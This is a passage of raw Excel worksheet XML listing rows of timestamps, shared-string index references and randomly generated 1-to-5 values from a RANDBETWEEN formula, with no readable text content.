        <f t="shared" ca="1" si="159"/>
        <v>2</v>
      </c>
    </row>
    <row r="10226" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A10226" s="1">
        <v>43342.46943287037</v>
      </c>
      <c r="C10226" t="s">
        <v>10</v>
      </c>
      <c r="D10226" t="s">
        <v>6</v>
      </c>
      <c r="E10226" s="2" t="s">
        <v>9137</v>
      </c>
      <c r="F10226">
        <f t="shared" ca="1" si="159"/>
        <v>1</v>
      </c>
    </row>
    <row r="10227" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10227" s="1">
        <v>43342.463923611111</v>
      </c>
      <c r="C10227" t="s">
        <v>10</v>
      </c>
      <c r="D10227" t="s">
        <v>6</v>
      </c>
      <c r="E10227" s="2" t="s">
        <v>9138</v>
      </c>
      <c r="F10227">
        <f t="shared" ca="1" si="159"/>
        <v>2</v>
      </c>
    </row>
    <row r="10228" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10228" s="1">
        <v>43342.460185185184</v>
      </c>
      <c r="C10228" t="s">
        <v>41</v>
      </c>
      <c r="E10228" t="s">
        <v>9139</v>
      </c>
      <c r="F10228">
        <f t="shared" ca="1" si="159"/>
        <v>3</v>
      </c>
    </row>
    <row r="10229" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10229" s="1">
        <v>43342.453912037039</v>
      </c>
      <c r="C10229" t="s">
        <v>41</v>
      </c>
      <c r="E10229" t="s">
        <v>9140</v>
      </c>
      <c r="F10229">
        <f t="shared" ca="1" si="159"/>
        <v>2</v>
      </c>
    </row>
    <row r="10230" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10230" s="1">
        <v>43342.442650462966</v>
      </c>
      <c r="C10230" t="s">
        <v>10</v>
      </c>
      <c r="D10230" t="s">
        <v>163</v>
      </c>
      <c r="E10230" t="s">
        <v>9141</v>
      </c>
      <c r="F10230">
        <f t="shared" ca="1" si="159"/>
        <v>3</v>
      </c>
    </row>
    <row r="10231" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10231" s="1">
        <v>43342.441689814812</v>
      </c>
      <c r="C10231" t="s">
        <v>10</v>
      </c>
      <c r="D10231" t="s">
        <v>86</v>
      </c>
      <c r="E10231" t="s">
        <v>9142</v>
      </c>
      <c r="F10231">
        <f t="shared" ca="1" si="159"/>
        <v>1</v>
      </c>
    </row>
    <row r="10232" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10232" s="1">
        <v>43342.434490740743</v>
      </c>
      <c r="C10232" t="s">
        <v>10</v>
      </c>
      <c r="D10232" t="s">
        <v>290</v>
      </c>
      <c r="E10232" t="s">
        <v>9143</v>
      </c>
      <c r="F10232">
        <f t="shared" ca="1" si="159"/>
        <v>4</v>
      </c>
    </row>
    <row r="10233" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10233" s="1">
        <v>43342.423472222225</v>
      </c>
      <c r="C10233" t="s">
        <v>10</v>
      </c>
      <c r="D10233" t="s">
        <v>6</v>
      </c>
      <c r="E10233" t="s">
        <v>9144</v>
      </c>
      <c r="F10233">
        <f t="shared" ca="1" si="159"/>
        <v>1</v>
      </c>
    </row>
    <row r="10234" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A10234" s="1">
        <v>43342.414224537039</v>
      </c>
      <c r="C10234" t="s">
        <v>318</v>
      </c>
      <c r="E10234" s="2" t="s">
        <v>9145</v>
      </c>
      <c r="F10234">
        <f t="shared" ca="1" si="159"/>
        <v>5</v>
      </c>
    </row>
    <row r="10235" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10235" s="1">
        <v>43342.402743055558</v>
      </c>
      <c r="C10235" t="s">
        <v>5022</v>
      </c>
      <c r="D10235" t="s">
        <v>290</v>
      </c>
      <c r="E10235" t="s">
        <v>8078</v>
      </c>
      <c r="F10235">
        <f t="shared" ca="1" si="159"/>
        <v>4</v>
      </c>
    </row>
    <row r="10236" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10236" s="1">
        <v>43342.377615740741</v>
      </c>
      <c r="C10236" t="s">
        <v>10</v>
      </c>
      <c r="D10236" t="s">
        <v>86</v>
      </c>
      <c r="E10236" t="s">
        <v>9146</v>
      </c>
      <c r="F10236">
        <f t="shared" ca="1" si="159"/>
        <v>3</v>
      </c>
    </row>
    <row r="10237" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10237" s="1">
        <v>43342.343877314815</v>
      </c>
      <c r="C10237" t="s">
        <v>41</v>
      </c>
      <c r="E10237" s="2" t="s">
        <v>9147</v>
      </c>
      <c r="F10237">
        <f t="shared" ca="1" si="159"/>
        <v>2</v>
      </c>
    </row>
    <row r="10238" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10238" s="1">
        <v>43342.320474537039</v>
      </c>
      <c r="C10238" t="s">
        <v>301</v>
      </c>
      <c r="E10238" t="s">
        <v>9148</v>
      </c>
      <c r="F10238">
        <f t="shared" ca="1" si="159"/>
        <v>4</v>
      </c>
    </row>
    <row r="10239" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10239" s="1">
        <v>43342.292731481481</v>
      </c>
      <c r="C10239" t="s">
        <v>103</v>
      </c>
      <c r="E10239" t="s">
        <v>9149</v>
      </c>
      <c r="F10239">
        <f t="shared" ca="1" si="159"/>
        <v>3</v>
      </c>
    </row>
    <row r="10240" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A10240" s="1">
        <v>43342.292627314811</v>
      </c>
      <c r="C10240" t="s">
        <v>41</v>
      </c>
      <c r="E10240" s="2" t="s">
        <v>9150</v>
      </c>
      <c r="F10240">
        <f t="shared" ca="1" si="159"/>
        <v>1</v>
      </c>
    </row>
    <row r="10241" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10241" s="1">
        <v>43342.22278935185</v>
      </c>
      <c r="C10241" t="s">
        <v>139</v>
      </c>
      <c r="E10241" t="s">
        <v>9151</v>
      </c>
      <c r="F10241">
        <f t="shared" ca="1" si="159"/>
        <v>2</v>
      </c>
    </row>
    <row r="10242" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10242" s="1">
        <v>43342.217800925922</v>
      </c>
      <c r="C10242" t="s">
        <v>173</v>
      </c>
      <c r="E10242" t="s">
        <v>9152</v>
      </c>
      <c r="F10242">
        <f t="shared" ref="F10242:F10305" ca="1" si="160">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="10243" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A10243" s="1">
        <v>43342.215717592589</v>
      </c>
      <c r="C10243" t="s">
        <v>41</v>
      </c>
      <c r="E10243" s="2" t="s">
        <v>9153</v>
      </c>
      <c r="F10243">
        <f t="shared" ca="1" si="160"/>
        <v>5</v>
      </c>
    </row>
    <row r="10244" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10244" s="1">
        <v>43342.205949074072</v>
      </c>
      <c r="C10244" t="s">
        <v>48</v>
      </c>
      <c r="E10244" s="2" t="s">
        <v>9154</v>
      </c>
      <c r="F10244">
        <f t="shared" ca="1" si="160"/>
        <v>5</v>
      </c>
    </row>
    <row r="10245" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10245" s="1">
        <v>43342.183113425926</v>
      </c>
      <c r="C10245" t="s">
        <v>1510</v>
      </c>
      <c r="E10245">
        <v>821059240155</v>
      </c>
      <c r="F10245">
        <f t="shared" ca="1" si="160"/>
        <v>4</v>
      </c>
    </row>
    <row r="10246" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A10246" s="1">
        <v>43342.179363425923</v>
      </c>
      <c r="C10246" t="s">
        <v>454</v>
      </c>
      <c r="E10246" s="2" t="s">
        <v>9155</v>
      </c>
      <c r="F10246">
        <f t="shared" ca="1" si="160"/>
        <v>4</v>
      </c>
    </row>
    <row r="10247" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10247" s="1">
        <v>43342.17900462963</v>
      </c>
      <c r="C10247" t="s">
        <v>542</v>
      </c>
      <c r="E10247" t="s">
        <v>9156</v>
      </c>
      <c r="F10247">
        <f t="shared" ca="1" si="160"/>
        <v>1</v>
      </c>
    </row>
    <row r="10248" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A10248" s="1">
        <v>43342.130613425928</v>
      </c>
      <c r="C10248" t="s">
        <v>71</v>
      </c>
      <c r="E10248" s="2" t="s">
        <v>9157</v>
      </c>
      <c r="F10248">
        <f t="shared" ca="1" si="160"/>
        <v>2</v>
      </c>
    </row>
    <row r="10249" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10249" s="1">
        <v>43342.114849537036</v>
      </c>
      <c r="C10249" t="s">
        <v>71</v>
      </c>
      <c r="E10249" t="s">
        <v>9158</v>
      </c>
      <c r="F10249">
        <f t="shared" ca="1" si="160"/>
        <v>1</v>
      </c>
    </row>
    <row r="10250" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A10250" s="1">
        <v>43342.108402777776</v>
      </c>
      <c r="C10250" t="s">
        <v>10</v>
      </c>
      <c r="D10250" t="s">
        <v>6</v>
      </c>
      <c r="E10250" s="2" t="s">
        <v>9159</v>
      </c>
      <c r="F10250">
        <f t="shared" ca="1" si="160"/>
        <v>2</v>
      </c>
    </row>
    <row r="10251" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10251" s="1">
        <v>43342.094050925924</v>
      </c>
      <c r="C10251" t="s">
        <v>253</v>
      </c>
      <c r="E10251" t="s">
        <v>7250</v>
      </c>
      <c r="F10251">
        <f t="shared" ca="1" si="160"/>
        <v>1</v>
      </c>
    </row>
    <row r="10252" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A10252" s="1">
        <v>43342.081574074073</v>
      </c>
      <c r="C10252" t="s">
        <v>140</v>
      </c>
      <c r="D10252" t="s">
        <v>234</v>
      </c>
      <c r="E10252" s="2" t="s">
        <v>9160</v>
      </c>
      <c r="F10252">
        <f t="shared" ca="1" si="160"/>
        <v>5</v>
      </c>
    </row>
    <row r="10253" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A10253" s="1">
        <v>43342.071226851855</v>
      </c>
      <c r="C10253" t="s">
        <v>197</v>
      </c>
      <c r="E10253" s="2" t="s">
        <v>9161</v>
      </c>
      <c r="F10253">
        <f t="shared" ca="1" si="160"/>
        <v>3</v>
      </c>
    </row>
    <row r="10254" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A10254" s="1">
        <v>43342.022106481483</v>
      </c>
      <c r="C10254" t="s">
        <v>10</v>
      </c>
      <c r="D10254" t="s">
        <v>20</v>
      </c>
      <c r="E10254" s="2" t="s">
        <v>9162</v>
      </c>
      <c r="F10254">
        <f t="shared" ca="1" si="160"/>
        <v>2</v>
      </c>
    </row>
    <row r="10255" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10255" s="1">
        <v>43341.993796296294</v>
      </c>
      <c r="C10255" t="s">
        <v>318</v>
      </c>
      <c r="E10255" t="s">
        <v>9163</v>
      </c>
      <c r="F10255">
        <f t="shared" ca="1" si="160"/>
        <v>5</v>
      </c>
    </row>
    <row r="10256" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10256" s="1">
        <v>43341.854502314818</v>
      </c>
      <c r="C10256" t="s">
        <v>140</v>
      </c>
      <c r="D10256" t="s">
        <v>234</v>
      </c>
      <c r="E10256" t="s">
        <v>9164</v>
      </c>
      <c r="F10256">
        <f t="shared" ca="1" si="160"/>
        <v>2</v>
      </c>
    </row>
    <row r="10257" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10257" s="1">
        <v>43341.836701388886</v>
      </c>
      <c r="C10257" t="s">
        <v>260</v>
      </c>
      <c r="E10257" t="s">
        <v>9165</v>
      </c>
      <c r="F10257">
        <f t="shared" ca="1" si="160"/>
        <v>1</v>
      </c>
    </row>
    <row r="10258" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A10258" s="1">
        <v>43341.827210648145</v>
      </c>
      <c r="C10258" t="s">
        <v>140</v>
      </c>
      <c r="D10258" t="s">
        <v>141</v>
      </c>
      <c r="E10258" s="2" t="s">
        <v>9166</v>
      </c>
      <c r="F10258">
        <f t="shared" ca="1" si="160"/>
        <v>3</v>
      </c>
    </row>
    <row r="10259" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10259" s="1">
        <v>43341.811655092592</v>
      </c>
      <c r="C10259" t="s">
        <v>6019</v>
      </c>
      <c r="D10259" t="s">
        <v>11</v>
      </c>
      <c r="E10259" t="s">
        <v>8504</v>
      </c>
      <c r="F10259">
        <f t="shared" ca="1" si="160"/>
        <v>3</v>
      </c>
    </row>
    <row r="10260" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10260" s="1">
        <v>43341.772013888891</v>
      </c>
      <c r="C10260" t="s">
        <v>140</v>
      </c>
      <c r="D10260" t="s">
        <v>141</v>
      </c>
      <c r="E10260" t="s">
        <v>9167</v>
      </c>
      <c r="F10260">
        <f t="shared" ca="1" si="160"/>
        <v>3</v>
      </c>
    </row>
    <row r="10261" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10261" s="1">
        <v>43341.766759259262</v>
      </c>
      <c r="C10261" t="s">
        <v>10</v>
      </c>
      <c r="D10261" t="s">
        <v>6</v>
      </c>
      <c r="E10261" s="2" t="s">
        <v>9168</v>
      </c>
      <c r="F10261">
        <f t="shared" ca="1" si="160"/>
        <v>2</v>
      </c>
    </row>
    <row r="10262" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10262" s="1">
        <v>43341.680289351854</v>
      </c>
      <c r="C10262" t="s">
        <v>10</v>
      </c>
      <c r="D10262" t="s">
        <v>86</v>
      </c>
      <c r="E10262" t="s">
        <v>9169</v>
      </c>
      <c r="F10262">
        <f t="shared" ca="1" si="160"/>
        <v>4</v>
      </c>
    </row>
    <row r="10263" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10263" s="1">
        <v>43341.622685185182</v>
      </c>
      <c r="C10263" t="s">
        <v>10</v>
      </c>
      <c r="D10263" t="s">
        <v>6</v>
      </c>
      <c r="E10263" s="2" t="s">
        <v>9170</v>
      </c>
      <c r="F10263">
        <f t="shared" ca="1" si="160"/>
        <v>2</v>
      </c>
    </row>
    <row r="10264" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10264" s="1">
        <v>43341.597905092596</v>
      </c>
      <c r="C10264" t="s">
        <v>10</v>
      </c>
      <c r="D10264" t="s">
        <v>271</v>
      </c>
      <c r="E10264" t="s">
        <v>9171</v>
      </c>
      <c r="F10264">
        <f t="shared" ca="1" si="160"/>
        <v>4</v>
      </c>
    </row>
    <row r="10265" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10265" s="1">
        <v>43341.593518518515</v>
      </c>
      <c r="C10265" t="s">
        <v>48</v>
      </c>
      <c r="E10265" t="s">
        <v>9172</v>
      </c>
      <c r="F10265">
        <f t="shared" ca="1" si="160"/>
        <v>4</v>
      </c>
    </row>
    <row r="10266" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10266" s="1">
        <v>43341.588425925926</v>
      </c>
      <c r="C10266" t="s">
        <v>10</v>
      </c>
      <c r="D10266" t="s">
        <v>271</v>
      </c>
      <c r="E10266" t="s">
        <v>9173</v>
      </c>
      <c r="F10266">
        <f t="shared" ca="1" si="160"/>
        <v>3</v>
      </c>
    </row>
    <row r="10267" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10267" s="1">
        <v>43341.586400462962</v>
      </c>
      <c r="C10267" t="s">
        <v>10</v>
      </c>
      <c r="D10267" t="s">
        <v>163</v>
      </c>
      <c r="E10267" t="s">
        <v>9174</v>
      </c>
      <c r="F10267">
        <f t="shared" ca="1" si="160"/>
        <v>3</v>
      </c>
    </row>
    <row r="10268" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10268" s="1">
        <v>43341.58452546296</v>
      </c>
      <c r="C10268" t="s">
        <v>16</v>
      </c>
      <c r="D10268" t="s">
        <v>312</v>
      </c>
      <c r="E10268" t="s">
        <v>9175</v>
      </c>
      <c r="F10268">
        <f t="shared" ca="1" si="160"/>
        <v>1</v>
      </c>
    </row>
    <row r="10269" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10269" s="1">
        <v>43341.581365740742</v>
      </c>
      <c r="C10269" t="s">
        <v>10</v>
      </c>
      <c r="D10269" t="s">
        <v>158</v>
      </c>
      <c r="E10269" t="s">
        <v>9176</v>
      </c>
      <c r="F10269">
        <f t="shared" ca="1" si="160"/>
        <v>1</v>
      </c>
    </row>
    <row r="10270" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10270" s="1">
        <v>43341.565300925926</v>
      </c>
      <c r="C10270" t="s">
        <v>10</v>
      </c>
      <c r="D10270" t="s">
        <v>46</v>
      </c>
      <c r="E10270" t="s">
        <v>9177</v>
      </c>
      <c r="F10270">
        <f t="shared" ca="1" si="160"/>
        <v>2</v>
      </c>
    </row>
    <row r="10271" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10271" s="1">
        <v>43341.550034722219</v>
      </c>
      <c r="C10271" t="s">
        <v>623</v>
      </c>
      <c r="D10271" t="s">
        <v>312</v>
      </c>
      <c r="E10271" t="s">
        <v>9178</v>
      </c>
      <c r="F10271">
        <f t="shared" ca="1" si="160"/>
        <v>5</v>
      </c>
    </row>
    <row r="10272" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10272" s="1">
        <v>43341.538449074076</v>
      </c>
      <c r="C10272" t="s">
        <v>6</v>
      </c>
      <c r="D10272" t="s">
        <v>114</v>
      </c>
      <c r="E10272" t="s">
        <v>9179</v>
      </c>
      <c r="F10272">
        <f t="shared" ca="1" si="160"/>
        <v>2</v>
      </c>
    </row>
    <row r="10273" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A10273" s="1">
        <v>43341.511099537034</v>
      </c>
      <c r="C10273" t="s">
        <v>10</v>
      </c>
      <c r="D10273" t="s">
        <v>52</v>
      </c>
      <c r="E10273" s="2" t="s">
        <v>9180</v>
      </c>
      <c r="F10273">
        <f t="shared" ca="1" si="160"/>
        <v>1</v>
      </c>
    </row>
    <row r="10274" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10274" s="1">
        <v>43341.508657407408</v>
      </c>
      <c r="C10274" t="s">
        <v>10</v>
      </c>
      <c r="D10274" t="s">
        <v>107</v>
      </c>
      <c r="E10274" t="s">
        <v>9181</v>
      </c>
      <c r="F10274">
        <f t="shared" ca="1" si="160"/>
        <v>3</v>
      </c>
    </row>
    <row r="10275" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A10275" s="1">
        <v>43341.483796296299</v>
      </c>
      <c r="C10275" t="s">
        <v>260</v>
      </c>
      <c r="E10275" s="2" t="s">
        <v>9182</v>
      </c>
      <c r="F10275">
        <f t="shared" ca="1" si="160"/>
        <v>4</v>
      </c>
    </row>
    <row r="10276" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10276" s="1">
        <v>43341.470868055556</v>
      </c>
      <c r="C10276" t="s">
        <v>10</v>
      </c>
      <c r="D10276" t="s">
        <v>151</v>
      </c>
      <c r="E10276" s="2" t="s">
        <v>9183</v>
      </c>
      <c r="F10276">
        <f t="shared" ca="1" si="160"/>
        <v>5</v>
      </c>
    </row>
    <row r="10277" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10277" s="1">
        <v>43341.467476851853</v>
      </c>
      <c r="C10277" t="s">
        <v>10</v>
      </c>
      <c r="D10277" t="s">
        <v>36</v>
      </c>
      <c r="E10277" s="2" t="s">
        <v>9184</v>
      </c>
      <c r="F10277">
        <f t="shared" ca="1" si="160"/>
        <v>5</v>
      </c>
    </row>
    <row r="10278" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A10278" s="1">
        <v>43341.448888888888</v>
      </c>
      <c r="C10278" t="s">
        <v>71</v>
      </c>
      <c r="E10278" s="2" t="s">
        <v>9185</v>
      </c>
      <c r="F10278">
        <f t="shared" ca="1" si="160"/>
        <v>4</v>
      </c>
    </row>
    <row r="10279" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10279" s="1">
        <v>43341.444282407407</v>
      </c>
      <c r="C10279" t="s">
        <v>6</v>
      </c>
      <c r="D10279" t="s">
        <v>25</v>
      </c>
      <c r="E10279" s="2" t="s">
        <v>9186</v>
      </c>
      <c r="F10279">
        <f t="shared" ca="1" si="160"/>
        <v>4</v>
      </c>
    </row>
    <row r="10280" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10280" s="1">
        <v>43341.443530092591</v>
      </c>
      <c r="C10280" t="s">
        <v>48</v>
      </c>
      <c r="E10280" s="2" t="s">
        <v>9187</v>
      </c>
      <c r="F10280">
        <f t="shared" ca="1" si="160"/>
        <v>1</v>
      </c>
    </row>
    <row r="10281" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10281" s="1">
        <v>43341.437291666669</v>
      </c>
      <c r="C10281" t="s">
        <v>10</v>
      </c>
      <c r="D10281" t="s">
        <v>20</v>
      </c>
      <c r="E10281" t="s">
        <v>9188</v>
      </c>
      <c r="F10281">
        <f t="shared" ca="1" si="160"/>
        <v>5</v>
      </c>
    </row>
    <row r="10282" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A10282" s="1">
        <v>43341.436898148146</v>
      </c>
      <c r="C10282" t="s">
        <v>71</v>
      </c>
      <c r="D10282" t="s">
        <v>312</v>
      </c>
      <c r="E10282" s="2" t="s">
        <v>9189</v>
      </c>
      <c r="F10282">
        <f t="shared" ca="1" si="160"/>
        <v>5</v>
      </c>
    </row>
    <row r="10283" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10283" s="1">
        <v>43341.395162037035</v>
      </c>
      <c r="C10283" t="s">
        <v>10</v>
      </c>
      <c r="D10283" t="s">
        <v>23</v>
      </c>
      <c r="E10283" t="s">
        <v>9190</v>
      </c>
      <c r="F10283">
        <f t="shared" ca="1" si="160"/>
        <v>2</v>
      </c>
    </row>
    <row r="10284" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10284" s="1">
        <v>43341.386701388888</v>
      </c>
      <c r="C10284" t="s">
        <v>229</v>
      </c>
      <c r="E10284" t="s">
        <v>9191</v>
      </c>
      <c r="F10284">
        <f t="shared" ca="1" si="160"/>
        <v>1</v>
      </c>
    </row>
    <row r="10285" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10285" s="1">
        <v>43341.375937500001</v>
      </c>
      <c r="C10285" t="s">
        <v>10</v>
      </c>
      <c r="D10285" t="s">
        <v>36</v>
      </c>
      <c r="E10285" t="s">
        <v>9192</v>
      </c>
      <c r="F10285">
        <f t="shared" ca="1" si="160"/>
        <v>3</v>
      </c>
    </row>
    <row r="10286" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10286" s="1">
        <v>43341.375567129631</v>
      </c>
      <c r="C10286" t="s">
        <v>10</v>
      </c>
      <c r="D10286" t="s">
        <v>6</v>
      </c>
      <c r="F10286">
        <f t="shared" ca="1" si="160"/>
        <v>2</v>
      </c>
    </row>
    <row r="10287" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10287" s="1">
        <v>43341.368668981479</v>
      </c>
      <c r="C10287" t="s">
        <v>173</v>
      </c>
      <c r="E10287" s="2" t="s">
        <v>9193</v>
      </c>
      <c r="F10287">
        <f t="shared" ca="1" si="160"/>
        <v>1</v>
      </c>
    </row>
    <row r="10288" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10288" s="1">
        <v>43341.347280092596</v>
      </c>
      <c r="C10288" t="s">
        <v>10</v>
      </c>
      <c r="D10288" t="s">
        <v>41</v>
      </c>
      <c r="E10288" t="s">
        <v>9194</v>
      </c>
      <c r="F10288">
        <f t="shared" ca="1" si="160"/>
        <v>3</v>
      </c>
    </row>
    <row r="10289" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A10289" s="1">
        <v>43341.321076388886</v>
      </c>
      <c r="C10289" t="s">
        <v>124</v>
      </c>
      <c r="E10289" s="2" t="s">
        <v>9195</v>
      </c>
      <c r="F10289">
        <f t="shared" ca="1" si="160"/>
        <v>3</v>
      </c>
    </row>
    <row r="10290" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10290" s="1">
        <v>43341.313738425924</v>
      </c>
      <c r="C10290" t="s">
        <v>461</v>
      </c>
      <c r="E10290" t="s">
        <v>9196</v>
      </c>
      <c r="F10290">
        <f t="shared" ca="1" si="160"/>
        <v>5</v>
      </c>
    </row>
    <row r="10291" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10291" s="1">
        <v>43341.277442129627</v>
      </c>
      <c r="C10291" t="s">
        <v>48</v>
      </c>
      <c r="E10291" s="2" t="s">
        <v>9197</v>
      </c>
      <c r="F10291">
        <f t="shared" ca="1" si="160"/>
        <v>1</v>
      </c>
    </row>
    <row r="10292" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10292" s="1">
        <v>43341.247523148151</v>
      </c>
      <c r="C10292" t="s">
        <v>140</v>
      </c>
      <c r="D10292" t="s">
        <v>847</v>
      </c>
      <c r="E10292" s="2" t="s">
        <v>9198</v>
      </c>
      <c r="F10292">
        <f t="shared" ca="1" si="160"/>
        <v>4</v>
      </c>
    </row>
    <row r="10293" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10293" s="1">
        <v>43341.235289351855</v>
      </c>
      <c r="C10293" t="s">
        <v>124</v>
      </c>
      <c r="E10293" t="s">
        <v>9199</v>
      </c>
      <c r="F10293">
        <f t="shared" ca="1" si="160"/>
        <v>5</v>
      </c>
    </row>
    <row r="10294" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A10294" s="1">
        <v>43341.229884259257</v>
      </c>
      <c r="C10294" t="s">
        <v>10</v>
      </c>
      <c r="D10294" t="s">
        <v>667</v>
      </c>
      <c r="E10294" s="2" t="s">
        <v>9200</v>
      </c>
      <c r="F10294">
        <f t="shared" ca="1" si="160"/>
        <v>4</v>
      </c>
    </row>
    <row r="10295" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10295" s="1">
        <v>43341.229016203702</v>
      </c>
      <c r="C10295" t="s">
        <v>314</v>
      </c>
      <c r="E10295" s="2" t="s">
        <v>9201</v>
      </c>
      <c r="F10295">
        <f t="shared" ca="1" si="160"/>
        <v>2</v>
      </c>
    </row>
    <row r="10296" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10296" s="1">
        <v>43341.226967592593</v>
      </c>
      <c r="C10296" t="s">
        <v>48</v>
      </c>
      <c r="E10296" t="s">
        <v>9202</v>
      </c>
      <c r="F10296">
        <f t="shared" ca="1" si="160"/>
        <v>1</v>
      </c>
    </row>
    <row r="10297" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10297" s="1">
        <v>43341.218217592592</v>
      </c>
      <c r="C10297" t="s">
        <v>197</v>
      </c>
      <c r="E10297" t="s">
        <v>9203</v>
      </c>
      <c r="F10297">
        <f t="shared" ca="1" si="160"/>
        <v>1</v>
      </c>
    </row>
    <row r="10298" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A10298" s="1">
        <v>43341.20349537037</v>
      </c>
      <c r="C10298" t="s">
        <v>10</v>
      </c>
      <c r="D10298" t="s">
        <v>6</v>
      </c>
      <c r="E10298" s="2" t="s">
        <v>9204</v>
      </c>
      <c r="F10298">
        <f t="shared" ca="1" si="160"/>
        <v>5</v>
      </c>
    </row>
    <row r="10299" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10299" s="1">
        <v>43341.201377314814</v>
      </c>
      <c r="C10299" t="s">
        <v>41</v>
      </c>
      <c r="E10299" t="s">
        <v>9205</v>
      </c>
      <c r="F10299">
        <f t="shared" ca="1" si="160"/>
        <v>5</v>
      </c>
    </row>
    <row r="10300" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10300" s="1">
        <v>43341.192187499997</v>
      </c>
      <c r="C10300" t="s">
        <v>48</v>
      </c>
      <c r="E10300" t="s">
        <v>9206</v>
      </c>
      <c r="F10300">
        <f t="shared" ca="1" si="160"/>
        <v>4</v>
      </c>
    </row>
    <row r="10301" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10301" s="1">
        <v>43341.178611111114</v>
      </c>
      <c r="C10301" t="s">
        <v>139</v>
      </c>
      <c r="E10301" t="s">
        <v>9207</v>
      </c>
      <c r="F10301">
        <f t="shared" ca="1" si="160"/>
        <v>1</v>
      </c>
    </row>
    <row r="10302" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10302" s="1">
        <v>43341.169259259259</v>
      </c>
      <c r="C10302" t="s">
        <v>260</v>
      </c>
      <c r="E10302" t="s">
        <v>9208</v>
      </c>
      <c r="F10302">
        <f t="shared" ca="1" si="160"/>
        <v>4</v>
      </c>
    </row>
    <row r="10303" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10303" s="1">
        <v>43341.152754629627</v>
      </c>
      <c r="C10303" t="s">
        <v>118</v>
      </c>
      <c r="E10303" t="s">
        <v>9209</v>
      </c>
      <c r="F10303">
        <f t="shared" ca="1" si="160"/>
        <v>5</v>
      </c>
    </row>
    <row r="10304" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10304" s="1">
        <v>43341.140208333331</v>
      </c>
      <c r="C10304" t="s">
        <v>10</v>
      </c>
      <c r="D10304" t="s">
        <v>6</v>
      </c>
      <c r="E10304" t="s">
        <v>9210</v>
      </c>
      <c r="F10304">
        <f t="shared" ca="1" si="160"/>
        <v>5</v>
      </c>
    </row>
